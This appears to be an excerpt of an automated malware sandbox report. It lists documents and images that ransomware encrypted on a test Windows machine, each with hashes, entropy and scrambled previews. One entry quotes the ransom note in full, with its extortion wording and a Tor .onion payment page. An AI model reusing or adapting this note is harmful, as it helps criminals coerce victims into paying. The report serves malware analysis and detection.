                                                                                                Entropy (8bit):7.852554106138658
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:SYCbZSMw1kQ7g8cXn8r6doxhFTUl4qLk2ywxD8O3VPMeilXYvb881:cbRw1kkgP36/xhFTS4qLk2ye3EXYvb8W
                                                                                                MD5:F4CFEF4A3590849EDFFB74DC7EC664F6
                                                                                                SHA1:60C7EE923133DE7637EC0D72BE38A7E4AE259EFB
                                                                                                SHA-256:6CBC129E13DAF60E8E213F2466F523E69D131DF73A728644ABB0B87E8A4F89BE
                                                                                                SHA-512:FE5406A8A4A679891D33B273211F72B197B15CD884A6DB52F97301EC4FDE8501846E4AD446A153586E95050DEB9BFEBB7069B0CFCD8A2CF4CE31AF9BFDCABFC6
                                                                                                Malicious:false
                                                                                                Preview: .D.U=..|uYb.7..Z.S.>.[.....r....8|fM.$.b..g.(..`.{O....%=._.Vj.. ..2..........h>K<..C....H'.z.....Z...t#=oV...v...u.R#......NWj...u.....l.S?...pP..{...U;...kM.....1.p..NY~...?I.-......%E..8)......F.).!A....Xgcd..06.vt!.y.$...T{.'DE?.o.5.$..g}}"..U...b.(..T.|k=(...w..e.d....ye*.o#..R.S\y.6OGk.B......W.....+.E....+...$.]L. .M...[...*...d..z.....\)4..uJ..=d...OE.0.... .?.R..u.!.I..R4.3...+...O,..`.CS,.q(..ro6}tE......#u....;..{.rs..j..on.^3e!..t.P.....8.t.....C/gh.......*-1....R......qK,.I.L.3-.).uq./q..A.X.%.=n<...4.h.D.T.?c....>4.[..t.w. .H..n!s.......H..:..h...F../..\...$....7]......&...P+...{....,..........{..+s..d..1[...6XN{.g....[M(.>.t..H....piJ..N/.>..~..]...j.>i.j..[....x.....l.q.t...].)...Ro..D....."I.5...]....YU.@..o{.,b.J>...!*....Sn..UZ...M.....M-.....r.Bq{...\'....al......c.#b3N}..n....+.Z)....T[+sEQ$.dYK......dK..y.'....p....D.......`...F....'.....T.............=.1s....XTl..U.?x..d...q..a.$.......D...+v....X..~{x.X..5.G....#{2..]S.
                                                                                                C:\Users\user\Desktop\SUAVTZKNFL.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.88085398067831
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:WlS+gSnyU+emWNWI/64h+azgiRM3vC5b28ZFMrnpVh/5yv5HLlzPP6JdYqxfm3N:GvnhmWE9qjzgi12AFcpViHWJ6Em3N
                                                                                                MD5:36744C5351598C12F8D2B532897E86E0
                                                                                                SHA1:6C1B18DD6F0F3F00E97D93FD7FE9442488EF8391
                                                                                                SHA-256:5993CEBC15AB86C497BAC2ECB1B947A7F06E6E8474089043F1579FD09865521B
                                                                                                SHA-512:9455BCFEA10D78975F07BED306DEB8BE4047BA2BC70942E8CF40AE287279A11B616F0794626ECBE0378E972B5B1BEE99239239101F731E4942319A7B897428CC
                                                                                                Malicious:false
                                                                                                Preview: r.|...a...Cz..j.Y........B~.0I.9{6.cB."...G....MN.]...z..&.la"E.......k...wX8.*K.l....%.(....Gv...S..[...*.WZ.c.k.....T.ULb...b.7g_...R.{0}...>..a..r1....yP...@...+..=.....\..+.......q.....;.....k.z..........6}......<g...X+..)........Y.x.B93.Yqc.%.5..O,.4......d.....'P.. f.%..C.O.n.Ol..v.6..1.t.%@........&...`X..z.....Y....GN{...7&xv.N..(51..r..>..x.h.o....E".b a..x....5O.><..^u.QF..._.I......Q.......e.....ko....FZ.....C...bq{.&?.).|s+.m...@c.../4v5.]zd[^..6.q.kC% h&.......92)a.1UK..8H=....Z..;....Z.3.4.dU..s0.s..s.4......V...!9..uX...[prCX.../.r....&._.(.R...U,.DN../.q...GrW.lm.:.,=....c...1.ix.H.:K....%w..;.../...n.0.......$a.f...ZP./s.yx.*...j....E...]'.*)..(.+.df.B..:..sf.;...=WM{`.v9..$<'..`A...1M..2.n'.Ml.9........}.?P/...a..0u.....mi0.....S{..H...5..4..\.T.D.>.{..)Q....2/.+..l.Ey.....<..}..dSv-G....[...o..z.8pn.|lx.+.F...iJ...8r.....]....B1D...MWR..}gh....;._.mGn....U......5"2.:*..J......8.Rg.o.V.."W.|.8/..\.l~...:~..r..*N....Kh.P3
                                                                                                C:\Users\user\Desktop\ZQIXMVQGAH.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.850086091154252
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:MCQR2Qe8BMcj+dd68rbQ033LOtTcR4UyJCdgVICUOVmRjB12scSNk:pQe9O+dbbhLOtAdgKCVmR91tk
                                                                                                MD5:2C1055CA0B1DC8050B3E7483E82CA0BE
                                                                                                SHA1:80AD515E95B68E2E034964E0E36B007FCBE8A51E
                                                                                                SHA-256:885DD2FD4ACB23ED6B07D7EF2F44C65330F28034CCBB74968B1C6560EAA7678B
                                                                                                SHA-512:E1F9FAF72C4CCCEB8869002698491EF608B7E0C4C420F6D93E154B4408D0FD2C4B9B750E0D55B47DB7050FAF18AE718961BD93E13B27397C29E6DF76E589AE6F
                                                                                                Malicious:false
                                                                                                Preview: ....sr......k..S.g.e*u...&qp...\..op....j.;{.h.8.."._..,....s......yY _.+>R.H+.3)(..4..Z^CU..u...b..l?...n=..YNc..\m...Q....z.,...\..k.^-L..<....R.{...i..0~;V5.Q....Q..3.........n>..M.8......=.J.C.A."...]..cd.2...-7jw0.9>...j_^}D..l..(..JEo...........?_....-....N......T:...0.c.9..<.?......TD.%.H=.I.C......+'.c?......@5.....W.(../q.|S....gB.....;....D.Ybz....@.rf.9..7~.~.S.w..u.).\.+.@.]"..:.....w1e.V.M1.....pS........5..0;m+v........z...S@.W#.....J690....!.cu%..). h...W....At..%....c.F....wK.o..C.Cq..)..P.OE.X.`..u./...d0Jn.Ku6..1.~........eu...C....".nF.o.....g...%,;..xU.......E...x.%..<.T...?.vX.:\z?w{p.....sT!.....[.z&.M.....VQ;.mg.JE>..:..6..O.....z*+?...V.......X2g..;..QE0..w....o3......?.W`<.Z..TY.....O......=t...pN.-zd...]..v.4f.....7-`Ig. <J.m;...-..g...vK0..2R.;...9.<....].,...............,.s.~.hW.;..F.....]....cc.(.....<T...}....8...8./..0....K.LU..E.1..%..`.L.D.R.Hr....6......x.....F.:.Y.....d.........U.R).........PMsHo..C
                                                                                                C:\Users\user\Desktop\ZQIXMVQGAH.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:DOS executable (COM)
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.868631352738677
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:+6V9F+XTcZJmdrr7Dfln1ZjUH6NwQN6iKzRKxvuKy1Y7LHlI8Pv4H8IooB5V78um:dvF+XTJ1lXUJsEzRyvLy1ILi8Pi8ILzK
                                                                                                MD5:30669B9B52FB541E7ABDA666ADEE0246
                                                                                                SHA1:2EB757C2F0802865A55B731C0BF761EE2A152AFC
                                                                                                SHA-256:52D0E0B4CAFE700B20D23EB70C7A275691C002A31BF6C3A7D59F8581B7DA531A
                                                                                                SHA-512:6F5B52C230BEC8965CBC71987128DE79DA60F05E4714171A2F1B485710EB523F14B727A5AB10CB231BB7F589E43ED116C8CCA78B9B3FBDDE048CCB1B2D1ED3C8
                                                                                                Malicious:false
                                                                                                Preview: ......n........]9T..).g%..hn.w..j.y}|:...@....p..B0c...'MrS,...<@.O........g..FI..Vx.%...lD....1.....4*LH.T..Y.q .[...k8.<.Y)Sk.u2..If...n-a.....y"...=..y...<.k..Y.......8".n.......8....Q....v).h`'....].....0.E.Z..i.+......9...N..e.UY..=3(...2'.z...4..0.............9.{t.O.E..,w..Z*N.*B.'1..2-.o..K.....C..I.V.}.~...w..*.b..L..J..K....=.dd........zO.C .lCn....i.B.t....}....6c,?.8l@.C....j...:....c<..S.j.o..=|.w.._|............$z...../.5.e[.. .h........~..W/..G..Z..X?.7....NlD.....?I-.rj....J.....n~0OY.*.....G:..U~q.F..ds..@...s....q.8X...sB{.R<......1.2.0..9..4..x.q.\>.I.,.wA`.r.tS.?....Q..Uy.W..C..)}.r..Ey...H.I........v........._d..@.(.l.Dz...<P..A...q.;.V.6n...........kwUP.....`..&.Zi.....^..U$...F.F.\_.ki..R....s.\.-....L.....I.:.............R....9&.|..?.}Rb.d..C...+Y....i.;`M..c.M.N..g..9.R..SOT.....GA.k.1<.....`.~6......3$z7..~P....b..#._.|9........u..._.Y9...}.8.:...E....%.l.Uq..f....@.s......Dg4FoSL.....N..i.~M..a........5.>K...J...y.....c
                                                                                                C:\Users\user\Desktop\ZQIXMVQGAH.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.825549119520685
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:36r7XnWyJW7x7tT6PGGfQVk6MSCEfwxIAuulEn8wXJEDBUCOEQ9VD:36PWsoeJSCEfwxI8Sn7EROECVD
                                                                                                MD5:9EA96ED094843D7E8F7E2C18F4B7F686
                                                                                                SHA1:77536AA2D1ACCCD834C8F6F760E4F07AA793EAC4
                                                                                                SHA-256:53677E825D937C0E636D86923F527FA27328E5B4829DAC58AB11B8D5E3D9F81C
                                                                                                SHA-512:1C507BA1C55B8DBF0E0BB1117A3031DE34C674C84C3602A7F6A4C3CDAA9AE1E55D2DC659FFEFBBFF3500A30FBBD1D4B29BAEF14D6354A72A9BAE70EC2FBC7B9B
                                                                                                Malicious:false
                                                                                                Preview: (....>.B.G@.o.1pL....M..BLov..6nv7.?...u#t.2.}..`.+H+.s+fQi..?.%K.o....kN.-EQ.w;......o7.@.{.D.%"1}.qF`.~}.$.=.~..v.qe..^peT8>......}=.6...........}.]/.E..>y.".|>.V..i.!...u......P.A....tIm.k.U.K...lu.w..B.V]...S......).\5...N..B..s.&..|.~.s.......,K.~.Jg.1...^z...C.._....EK.I..e.e.\...r...x#...]......l....-..A......?...vv......i..g.....2$.....7...-. .......C.0v.q...4.....R.|.....3,.....y..f........[.'..-@.x....<.rNS.ZO.p..A..={.i7./.)Gfa..2.f..O.....|.u.E..$Z..1....].....>i..y.N..dXD.K.x...u....S..}..`...G5._l...UJ..."..A.~..1?.z....Ek.Qp!.{]...E.>..I....K`..>.J..<"0=.{ZF...i.t..........3..J.u/....Y3.O.p.%.)....pc......[....G.T.....k.|_..o.'U......@..JE....w....%[......u..j......WGd......:..KG....A`-(....,.>.M8...". h.O.........>k..[.;0.....q[1f.T...~l0-.?..m.........8........i.E.F...&0.%.2..h..r..I.*k....+..z....q....CIy....j.......d.....Y.(.....d...H...x...h.5Pnp..n..c..<.l."....F.Y.ic..w...,........X..Dr......"..El...'.^J.,.k.-..
                                                                                                C:\Users\user\Desktop\readme.txt
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3004
                                                                                                Entropy (8bit):4.834891694847581
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:eUimvpiIXMwOH+QMHw0dHrHeH+lgE0UimvpiIXMwOH+QMHw0dHrHeH+lgEV:erWxnOEbL+AsrWxnOEbL+At
                                                                                                MD5:62318A9E589ED3CE4D5AED91188DB708
                                                                                                SHA1:1C51B8F63FB9DD87C9BBF9714B03D082BBABEDF8
                                                                                                SHA-256:E7AE9C658A09C776DCA83794E0FD41DD2E8E0CB888626BDF07650E564B4585FA
                                                                                                SHA-512:5BA95687AF6C750F0DD91825B9F72AABC17B17226FB6FEB7E5AB98DD4F1028C763C4BA72CA0A102F6AC33C8925FB1B2EEEABA5C0E25D3B848B0AF0F2681B02AB
                                                                                                Malicious:false
                                                                                                Preview: ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!.. ====================================================================================================.. Your files are NOT damaged! Your files are modified only. This modification is reversible..... The only 1 way to decrypt your files is to receive the private key and decryption program..... Any attempts to restore your files with the third party software will be fatal for your files!.. ====================================================================================================.. To receive the private key and decryption program follow the instructions below:.... 1. Download "Tor Browser" from https://www.torproject.org/ and install it..... 2. In the "Tor Browser" open your personal page here:...... http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj...... Note! This page is available via "Tor Browser" only... =============================================================
                                                                                                C:\Users\user\Documents\BJZFPPWAPT.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.8556839955969044
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:K2m+VC9XM6eKBztK6qEfzHGOhFbHbS0M9duHEKvsZ1QzY8MdnCCIDUeko0EHXrGc:K2m+V1JKV1GObI9kEJZmzkCCyUm3X
                                                                                                MD5:D174D5E0D74218DE24659DBCC0D0FC94
                                                                                                SHA1:433DDDC32C39A4F181F5B92AEE401565DC5FA945
                                                                                                SHA-256:45110D6827E4B9E463A421F88A64E70F70A6CD54A61230022E1064612D47E5DA
                                                                                                SHA-512:EB9212E704BE34028DF4AC42BFA99525250D287043012053F6F20A5C330A9E598EEAF8D2E3608C3895B8A547581A734E752F72FB71FFA7393A8816338644940D
                                                                                                Malicious:false
                                                                                                Preview: ..=2.]. s.7.BA..:.c..&.J....:>.D(.4w.Wm.W3.1>.F...a..<i..>.:....4<d.g..kDH.....$....u7...c/...lG..Ht...0..,\xs.-..X=......-J...v$...e..A.x......Q-~.t.x.M..j..g..j.p.W..l#.....m'..#V..)...V.W.w6#.EOv5U.w..".....U....B(f..T.8.....8.sE.".pg.|.t$q...;j.......%.)>......L..CB...h.<.R?.a#...<!..#....S..X...i0...."..5..i..+...u.H@L.]..J......z.J.f.....A.^W....o....[".....M.RI.lK....}.....4h..`O'.TIj-.....t..4.x(.<..q..tQE..*....Jg^H......2G.Vbq}&..^.V._....).Js....t.t.x........~..'..}.U.....g......~L.c..+......-.*P.....7\.).../=..o...0..U...XH..:..:...w..{..8....Z..\.|q.....C`,...._..K.2].?.....v(K{5...W.5.....I`.T..@.{......j....|.I.&$J.To...V.......OD.Z'..yt...G1,@f.p..$J!Y.#Ir...)...B.....~..].ml..."b3...1..Q.9..=..#.EZ{.c..u..m@~bX....X)...............'..&.a..J._`)1w.........._./....R.ls]..k....L5`,..eA.....Esx.u.c*..@..<.l..5< ..$.f..0.r.+E`.t..+oaK....j......$..%ZGj^%..Xl2.f........=!.:.6.C...&Zx.,.}g...D..2..y..&..q0.......[....>.
                                                                                                C:\Users\user\Documents\EEGWXUHVUG.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.867986420207379
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:OL0ntqS9h/WxMVLFL4zy5SuVr8+QdNrcDlQlilxCS5BROpI4IOZt2atXVgn/cX5S:e0ntqaWxMVLF9r8/XAZzNfspIOt2atXa
                                                                                                MD5:7E86ED77283BCA793181F7A656F25F52
                                                                                                SHA1:45BD9F4534BD518AABE6B43F9C6EA779823AA3FA
                                                                                                SHA-256:08CB1FAFCAED8F65F9924F66D36368A3835B858E3D025EFA9C573B1395225DD7
                                                                                                SHA-512:45550C04C721DDA724A6DA78A85DF3ACFB9534F4E671A19327CE7E1EA5A5DD24C19C7B41AD8E4A61598B26693698031791850FC15AF90F730AA362F6B4470B82
                                                                                                Malicious:false
                                                                                                Preview: 6...Q.....5..|...n......R}.{<....%...m.'._.....\5.....<...a4..Ty...[....)|B.|.~.h...UU..r..+._.W5-..(.Z.}`!.9g......!~R..G.n...M.u M...!..h...b......u...B..=.-...|.=..1p.^..].....7.5&Y.eRO ...G3MG..K8.SA.T.Y.#.&...>.XZ..vP..>.k.$..G;...c.g..7....po..aG]./....@.z.../....E..x[...!8...;....1...j.$.W.........c.fx..O.......8g.......A'.S....q...s.\4.fmC..:..e,.$A.A..|....J.[.?....(................B_`_CjNeO...C...>ER.-.................CV.K.(...v........M&8...".~.%.}...?.@J..&....R.I\h..`....t.zu^..hHR.>..h.J0%..,...\.V......V?.Z@wA4 y@@v. .....`.w.eF.MDs.bA.M..X8!.}..L...dy.G,.,......x R.V_.|.&..n.<....[.....k..R..gB..%1........NAYw.e.Y..r......T.zz[.'..C...q|...7E./.uM.NU/..)..G.B.h.$@_.~......4?..ITf..#.....>KX...I...../D..?.9..M.P..........z^...:o..u.i....A.2u.L...F#..ij.W.......0*'..I.....bqyT..4.\-.A....:J -.^U.y.6.J<..Bx[mz#&.7.<f.\.......-eQ....r...bT..h..M..1.c.|..d..2...]0..x.8..lRI...A...@.....3.........X....V.;{ .4i...f7(..i...F.....:
                                                                                                C:\Users\user\Documents\EFOYFBOLXA.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.847831639575832
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:aLi7DziUNwTyLB8y/5MCLRzQDSt9C/x/KZxuu1lIBHzt0sRBtfvmmL1lHBeW3Q0A:1DuUNYg8y/53JQcYdy1lI1t3RBxv51lu
                                                                                                MD5:81AA624A0CCA97A07C8AEDDADE45508C
                                                                                                SHA1:C7E40DBB3095562CECC5A760C4C2B2ACEAD518F6
                                                                                                SHA-256:2764F3DEC366BD99F029395D679693D42A9CD0402AEE1D6E570F4C3FBB8108B5
                                                                                                SHA-512:077BFC2FFCB47ABDD9D37DA47D558A3C40CDA357DE6F9CB7B2D137A7EFA4DAF242A5C5A1C69BFCAB9BDF796C5AB74AF45CC5F3099E9EA176824E30EA686EE053
                                                                                                Malicious:false
                                                                                                Preview: .....e.j2...@v..g]zH<..$....n...e.....x,3..X.#(#F{e).....F[x.K1x)...;S1#.-.?~.iXy~...{.....K..8!....%..QS...O...=...K.*`.<.\.l*..b...IR|b......{.-Y."..$.q..s...v>]...*..yb.:...Z.@.Ufp..6q........../..v.3.a.....y1..&.I../(.}.......wjh.vN.......a..i.3..wd.hH..{p.k.<.}@R.c.FZ...H....Q?\.../.D[K...d.*M..I..7.c .-...#...F..m..k..c.Z.7....~L...Y.?.k.Ng..D....G@.Fi.D..X..K..z..+.&U.<....qW.n.L.Ba.$...#7...1......S|A*..%.M.f.'.1..].NoZ.......HG^.+......<...5..:...3...K......di....9.X.`#[Ng.q..bi.....f..&[....f......5..%.&.j...G.R.*...bT...X....6.z":..]A..F.-.....iGf...$.z..[..9..?.....1z22..iE..."..@o..s.:eYL....G...(0L..{.KrF..w..!q..p....p....`.tR.Usp.N.)..C...d....-...G.L.Q..a..!.0..j...................\..%/9..C...j....._...,A(...ez~.#...t....w...%..?{...?F.VK......$..'.A..pi.wF..#X.+.u.v.+.Y..^......o..G...c8..I.d...3).....qu...Q.8...vN.0.....{.Wh..|...@cL..D..7.....T..dhZXz.}.f.....hj.-.)=...7/...Z......swnG..J4...n...y|d.......h.....x
                                                                                                C:\Users\user\Documents\GAOBCVIQIJ.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.848125285511834
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:vgL8IEX1J7dfL8Z2rTBkW5d44qscDW+LwEy2/9TSRvLzaGd1Qqk85iJ2x/i86:fj7dzjrNkci43OlsEyWNSRqGdB5//i86
                                                                                                MD5:B172F08CA0705D9A14EB3C41E376385B
                                                                                                SHA1:428B209D8A2DEAD17044B0C1B69AA27BF9904CC4
                                                                                                SHA-256:F84992591828D460B8FA81756F790AA759AAD96BF2CB7E28898A83C8A6DD2479
                                                                                                SHA-512:D2E9D6FBAF87835665EFA9EFFA7AA692C6EE58E75C39B6233B7E2855CA0DCAAAA1D208B39D81FAF756FB461FF89B33B8808398579A1C596318EB15CC948D39B6
                                                                                                Malicious:false
                                                                                                Preview: S'I.<...R..^........iK.=....!a......D37C~=..{`.'.-...N:+N....\....A........X_".y.Y.qa.E...F..p.j..Vb8R3(.W..."..DX..:..._..[.&U.XW...".^0...oud.......D...B..8..{Y.f(."..}...)..s.gw.G...V...9O1.Y.lRl...]#..H.-..r..t..YV..h.._k...E.6.....u.'...t..........i.'d'0.8..?.......h5?..}...J8.!.o.$..R.....[......!6...]..R......./*...:h..\5;M.BdypSf..u..../.. q.N%,...f..Ao5..9......@L....#_>6zw..<x.r...B...U+L*.'.................H.$.5.Lg......6.SB..F...kn6.o......IR.......=...@.2R\.......;..... D.I.k.......T..A.J}.....>..p..1.{\.#.n....g5....9..(...P5..D..2...h.98.....:2..."..t..\.Q....w...&.....P@kP..<l.s.@_.z.:..m1`..=.N..+..0T.23.?.m^."..z....`.w..i..=....H...F....Z.y.J..........s..\......C..[....Y..K^.ky.T>.F...a.[F...{.+W;.....Fu./=VPh......R7."@........`{A..eks.~....(..IW....llN..[..........AFb...b..Y/....X._0..\.w.I...._i.[..A.8._...!q..M..P.pQx-f...~....Wv..P..l...1cLB<x>....W.E..:.rv....I.[.......Q.sg...P.+...dx......P[u.
                                                                                                C:\Users\user\Documents\GAOBCVIQIJ.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.862925502240095
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:kttDEWmYA9kkMATJMEq9M+qQlwh+4TwRVhNw/0C+lot806Z:arA9vpTJrqFDlQ+4ob+6lot8z
                                                                                                MD5:9E492972574D4B32DB709492BD0A6CD8
                                                                                                SHA1:E33B7CB2ADA7751FD0328D1BA5CF031FB698C8C3
                                                                                                SHA-256:6AD36234BB0CAF8060DEA68ED889F6DA00D0F19EF95F451B0C73C2AD14C703A9
                                                                                                SHA-512:3EC602619243C1F0DBEF836B8339D65D2C94E727F905255F9AA7FEE12D08712CE7EE88E3A2845248AA6033E9A13618764D2628EF65D0F92683D935AF42D3D475
                                                                                                Malicious:false
                                                                                                Preview: ../F.J....f..4.H..v#..=H.....!.y.._.A.z. ..'V.G..)Y..4.9....#.'.}J6.j7.BU.K.lXK..W.G.T}..~......t..xn....vC.Z....F.....A.|.x.\.7...... .$l/FWo...9.x2.bc..]y..)%>/T.....Z..q<=.$.l"....]..R.*~..I..E^..G..6.......3....`.......s.@.......<n....n...+...e[b5...Ty.......+.......QA.s.......^G...z&..T.F.7.....+....b....M.g...@.s.\e7o.C.....A..+...p.@....8.-B.9s8c)...H.!..M..t..[3..M...R^.=.<.....&...[|....d..p.....c...n....U*:..=.7..IL....+.=?s.A.h.......K0IOs...,.p.2#HQ....f_q..Z.U....,.[w.]A.T...Q.n}.a...z\.....r..!_.../aKu`Q:...s8z..u...,..E..P..@.{v.j..N...<iS.8".f..H./.h....t#3z..{.-p.....)Mh-.H..?...f..B.$.2...2...U...7X..=.dgT....Vn..d<.^B6...+.....r...e..B~...fy.^t..0j...6.f........T...t.4.q.......i....F.Q{.%..Y.....,..sC}...{..M. 9...&.f.!w..D..".ZS..A......>....1....2.`....r....z.._nD5,.S...<..5.....=t|...sz.g...[.y.x..SV.i..v.j+G.@{.@UG..p.c....."...m....}-?..31........sr..Q.3.$l.j...N.]..s|.r.OK#.92...Qn..W..K..=.@..h....*..
                                                                                                C:\Users\user\Documents\GAOBCVIQIJ\BJZFPPWAPT.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.837997597923759
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Lm8J0FljnR1egNd7UQkE5nfeAcH6MukgCN52+OHZmL98lDj3r:X0PjniZDE0JHN4CjwI0DH
                                                                                                MD5:115EE7EF0DF538A73AB0917CE14BFF29
                                                                                                SHA1:18A504E16FEB096B108CE6F54465904FA07C6D0E
                                                                                                SHA-256:3E60A5C5DE2AD564F129D785929C3FEFBB19D0907E0218A90D5DA8C1250B87BE
                                                                                                SHA-512:07CD06BC0B00FE99484AAADB15B7E4B27495EA2CE29EAC8C36997D1D01D39256BC5F448856F2A56016DBF8DB3881528868BC6B018B76BBEAB74654919A930F38
                                                                                                Malicious:false
                                                                                                Preview: ..&..._j....8..t......sz..w.).a....U..?....d.X....PI..a..>.R.SS.o....\.........#..k.P...n....g.......%_V......c.?.xw.?e.HT(...Q.t...,Y@.W..p..R.W..i..f..bPX?7..)s.]..b#....z8.2./{...9...3/...........~.N.d....?W..r..t..]k.f....;..=s..$-.XK....2.~.X...emI..".t..4....y..0....s..:c.u..,..$`uR.>....-%P.....kv.:`6=.r.7l...-.p]An)GW8..X...F...Z.u.X..f.I.O.5q..`J.1..U..=...."k..Q......../X..{...-........f...V..=Gcxl..,.*...-.bEJ..C..%..._.@..Qc..3..3.95..+b..S#.f....f......:.....q^..$...v=..,..Q..B..X..J.......7hc..cA.YE/._.Q|..@.......(..9..Jx..x...M....K"...g,V=.(..7.xa.).+.....{.}_#.st_.l9(...g.'G..k.....T.pK(.h..A......p..!X.6.GPlk..oF..b......;H..L..Co..2.>..[oz...Z..<.ud[.`.......qF.=V.V....z...,..O[}..V.-.GJN.,.._.kT..aY.v.....0....u...T...UT..NQ`/......).....k..h.........IU..........I....l.|.z.W.F...$[@WJ./...~.......H...U....Fl..?lkx.......T"P.....nO.......O.?UC.L..XWr....G...s...J4..Q*..ET..E..d...<........{P=1...X/....Pu..B.w..
                                                                                                C:\Users\user\Documents\GAOBCVIQIJ\EEGWXUHVUG.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.838597854294913
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:SjI/pi8isioynZRrEHD82/Am5JPoySpbjNlHnpmLhFnfs29gfu/R:kI/c8isv2UMm5JoxXbHQda2v/R
                                                                                                MD5:F6082FB3350BDF9BADD00E54312187BD
                                                                                                SHA1:6CB27A6F958BD5C76793080F915DAB53A72526F1
                                                                                                SHA-256:C5E0FB3E0E5E9FBC0212D73FC85110AC8D08B8554536D8EB163A1F00B965C466
                                                                                                SHA-512:07640C81EC21E03C514190D29A3BDBB7F826CB6004B93FE00BDA84C502ABB214B0F10537D97F796669EB9C051848B5DA4B8400BB53DC31114ED753B558A34739
                                                                                                Malicious:false
                                                                                                Preview: o.OE.(..$_..n./.Sz....*.C~G...u....0....kJ\.SFemQ..I....@.<..._de..v...v..MN.<*M@.'L\.E......P...p..&......w......}H..D..e......KI\..Dt.s.c../J..C...W_K.......p..'.Q`1F& y.K.m.....]e..U..~......H1.c.A3Q.?Xvtau.e;.S.....F..:....Mpf.%e....b.s..^#.d..._/z......Ly.y....Jj.m..x.R.;$..-.9.n.. I..L.1...Cl.T..V.7d.<.:....W....>H.?.5...8.n8......<].I..-...N..$.VS.7.Sw..(<.z=Q....b..&.v..+...$......L.i.&e[.a5.a&O."........6..U.......eA....R./V.......Zc.2.^..bg..cCI!.xv;..{.H.....R..?.Zo...s.RV..>..I......D..a.<...Q....v|n..8.....fS!$...9aS..f..E...,|....o..H.......bX...h....t.8.......qG.8.d.%..V._.........N.+.a..F .'|E...g.#...}.<Y~.....n..VC.y.P.r{.tW?u^zJ..8..g...6>w..A*.p.^.1Bmh.DM..K;.\.....WAd......k............D..i?..P...E.W.d|..K..\sI^.>j2.].h..8L)...?..t.R.3.j..A...n....M.-.S".p..h.nB..2E: @jK_WI/.....%./T.u.....y"K...8.\P.j:..MiG.....@$...%.2..\.......<....+nA:.l./..}<..[..2..'.j%C?..$'.r....=p.../p.&F.Y/K.6.C..z.z#...Z..l^F.5....K6b..ra~.V...
                                                                                                C:\Users\user\Documents\GAOBCVIQIJ\GAOBCVIQIJ.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.8577420888048595
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:KulCyIcSzPsXI+j541EAJ5BAwSZUKg2gX7dB+LyMH81TZfd6vI:VlCyBTX/wSZfg1X7qLH8hZfduI
                                                                                                MD5:991AF8C8FDE19616AD9BDCA0B7148308
                                                                                                SHA1:9C1E410756752B4D3D055923AF9063B5A28774FA
                                                                                                SHA-256:B965B6225F5EC8F9E8753E234C4CA8C9F491A257A01A206E3D7C0DD7A172A49A
                                                                                                SHA-512:7F683E45523EFAA80093579FEF5BE2A58BE51B624BD93554DB9522E4CFCEE4FDAD1596CC88A594D05A3E4E540C8816C5C6C872211A8BD7C6F8B1DCBCF9E15FF8
                                                                                                Malicious:false
